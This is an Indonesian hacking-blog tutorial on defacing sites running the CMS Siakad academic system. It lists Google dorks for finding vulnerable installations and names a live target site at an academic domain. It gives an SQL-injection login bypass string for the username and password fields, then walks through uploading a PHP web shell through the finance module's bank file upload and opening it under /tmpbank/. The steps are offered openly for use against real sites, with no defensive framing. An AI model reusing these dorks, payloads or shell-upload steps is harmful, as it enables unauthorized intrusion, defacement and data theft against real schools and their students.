Deface PoC File Bank Uploader [CMS Siakad] + Live Target

Rianda ID
Desember 02, 2020


 Hello gan, kembali lagi dengan saya Z3X dah lama kita tak bertemu lagi dengan artikel tutorial terbaru dari blog ini. Dikarenakan mimin juga udah mulai beranjak pergi dari dunia Underground karena fokus ke dunia realita hehehe,,,, Tapi santai aja, setiap blog ini update,, selalu ada tutorial dan hal menarik lainnya terbaru.

Dikesempatan kali ini mimin dikasih tau atau di beri tutorial dari teman, jadi ini live target bukan dari saya namun dari dia sendiri, dia yang ngasih :v ya mau gimana kan gaenak nolaknya. Proof On Concept kali ini yaitu File Upload Bank CMS Siakad, hanya saja ketika login mirip bypass admin jadi ga susah susah amat gitu bagi kalian para heker heker sejati. Kita capcuss ke Tutorial nya ya.....

Dork : 

inurl:/?mnux=login&lgn=frm siakad 

inurl:"?mnux=" intext:siakad 

inurl:"?mnux=" intext:akademik 

inurl:"?mnux=" intext:sisfo 

inurl:"?mnux=" site:id 

inurl:"?mnux=" site:com 

inurl:"?mnux=" site:net

Live : https://siakad.binamandiri.ac.id/

1. Dorking seperti biasa lah

2. Lalu tampilan awal akan seperti ini, kalian pilih Administrator atau Superuser itu terserah kalian , dikarenakan sama saja fungsinya, seperti bypass admin

Kode Login : '=''or'

Pass :'=''or'

3. Jika berhasil login maka tampilan akan seperti dibawah

4. Selanjutnya kalian pilih "Keuangan" terus klik "File Biaya Mhsw" , isi data data nya terserah kalian, lalu pilih "File Upload Bank"



5. Nantinya kalian akan disruh upload file, disini kita kan seorang depeser :v pasti yang di upload adalah sebuah Shell


6. Setelah itu tampilan seperti ini tandanya berhasil, tinggal kalian panggil site.ac.id/tmpbank/namashell.php



7. Selamat anda menjadi seorang heker :v

8. Upload Script , Done